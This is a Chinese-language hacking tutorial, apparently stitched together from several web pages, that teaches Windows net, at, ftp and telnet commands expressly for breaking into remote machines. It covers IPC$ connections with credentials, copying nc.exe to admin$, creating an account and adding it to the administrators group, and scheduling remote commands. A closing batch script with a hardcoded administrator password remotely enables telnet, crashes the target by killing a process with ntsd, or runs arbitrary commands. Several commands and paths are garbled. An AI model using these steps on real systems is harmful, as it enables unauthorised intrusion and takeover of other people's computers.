這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是 微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車如圖6。

在這里，我們重點掌握幾個入侵常用的子命令。

net view

使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。

net use

把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x： IPsharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7 建立IPC$連接(net use IPIPC$ “password” /user：“name”)，

建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe 192.168.0.7admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。

net start

使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦?就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。

net stop

入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦?利用這個命令停掉就ok了，用法和net start同。

net user

查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。

1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。

2，net user abcd /del，將用戶名為abcd的`用戶刪除。

3，net user abcd /active:no，將用戶名為abcd的用戶禁用。

4，net user abcd /active:yes，激活用戶名為abcd的用戶。

5，net user abcd，查看用戶名為abcd的用戶的情況

net localgroup

查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。

現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。

net time

這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎?我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段(後面會講到)可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time IP。

六，at

這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序(知道net time的重要了吧?)。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間(比如2分鍾後)執行某個程序和命令。用法：at time command computer。

表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務(這里net start telnet即為開啟telnet服務的命令)。

七，ftp

大家對這個命令應該比較熟悉了吧?網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放 ftp服務的主機(一般都是開了21埠的機器)，如果你還不會使用ftp的命令怎麼辦?下面就給出基本的ftp命令使用方法。

首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入“help”來查看幫助(任何DOS命令都可以使用此方法查看其幫助)。

大家可能看到了，這么多命令該怎麼用?其實也用不到那麼多，掌握幾個基本的就夠了。

首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入“open 主機IP ftp埠”回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。

用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。

接下來就要介紹具體命令的使用方法了。

dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。

cd 進入某個文件夾。

get 下載文件到本地機器。

put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼 利用就不多說了，大家就自由發揮去吧。

delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。

bye 退出當前連接。

quit 同上。

八，telnet

功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼?它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以 administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。

然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。

當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。

到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。

另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼(輸入法漏洞差不多絕跡了吧)，哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。

H. 如何用CMD攻擊別人電腦

首先，電腦的系統要相同（這樣防火牆的等級相同）；
其次，所針對的電腦要在一個網域；
方法：
開始菜單—運行—輸入CMD—回車，然後在打開的命令提示符窗口中輸入：
shutdown -s -m \\ip地址 ，回車即可。
具體命令，參照：http://..com/question/1817633159546503908.html?fr=iks&word=cmd%B9%A5%BB%F7%C3%FC%C1%EE&ie=gbk

I. 怎樣用CMD對已知IP的電腦進行入侵

知道IP先運行CMD.再輸入TRACERT XX.XX.XX.XX
其中XX.XXX.XXX.XXX為對方IP,看到第4和第5行就是別人IP上網地址,
開再個DOS窗口.輸入NBTSTAT -A XX.XXX.XXX.XXX
就可以獲得別人用戶名
再用ＣＭＤ進入別人計算機吧。其它的ＤＯＳ指定自己去找。
-------------------------------------------------------------------------------------給你個bat

set /p num=密碼正確!請輸入要攻擊的機器號(如D01):
net use \\%num%\IPC$ "2966220" /user:administrator
:f04
cls
echo 1.開啟對方的Telnet服務!
echo 2.重啟對方機器!
echo 3.輸入指定命令!
echo 4.返回上層
echo 5.退出程序
set /p ch=請選擇:
if %ch%==1 (goto f01)
if %ch%==2 (goto f02)
if %ch%==3 (goto f03)
if %ch%==4 (goto f00)
if %ch%==5 (exit)
:f01
net time \\%num%
set /p tim=請輸入時間,將上面的時間延遲兩分鍾:
at \\%num% %tim% net start telnet /port:456789 /nomsg
goto f04
:f02
net time \\%num%
set /p tim=請輸入時間,將上面的時間延遲兩分鍾:
at \\%num% %tim% /interactive ntsd -c q -p 160
goto f04
:f03
set /p ca=請輸入命令:
net time \\%num%
set /p tim=請輸入時間,將上面的時間延遲兩分鍾:
at \\%num% %tim% /interactive %ca%
goto f04
exit
:st5
cls
set /p numb=請輸入對方的機器號(如D01):
:mess
set /p msg=請輸入消息內容:
net send %numb% %msg%
goto mess
exit